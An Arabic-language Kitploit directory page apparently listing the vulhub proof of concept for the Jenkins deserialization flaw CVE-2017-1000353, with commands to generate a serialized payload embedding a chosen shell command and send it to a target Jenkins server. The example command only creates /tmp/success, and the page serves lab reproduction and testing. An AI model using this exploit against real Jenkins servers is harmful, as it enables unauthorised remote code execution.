Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-1000353 — jenkins CVE-2017-1000353 POC | Kitploit
أدوات/GitHubGitHub/vulhub/cve-2017-1000353
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

عرض المستودع
5762منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-1000353 POC

كيفية إعادة إنتاج ثغرة Jenkins CVE-2017-1000353؟

استنسخ هذا المستودع، واستخدم الحمولة الجاهزة jenkins_poc.ser مع الأمر التالي:

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

سيتم بعدها تنفيذ touch /tmp/success.

متطلبات إصدار Java

مهم: يعتمد توليد الحمولة على إصدار Java. تم اختباره بنجاح مع openjdk:8u292. قد لا تعمل إصدارات Java الأخرى بشكل صحيح لتوليد الحمولة والاستغلال.

كيفية توليد الحمولة jenkins_poc.ser؟

حمّل CVE-2017-1000353-SNAPSHOT-all.jar.

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

إذا كنت تستخدم Docker، يمكنك استخدام الأمر التالي لضمان التوافق:

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

المرجع

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

تنزيل الأداة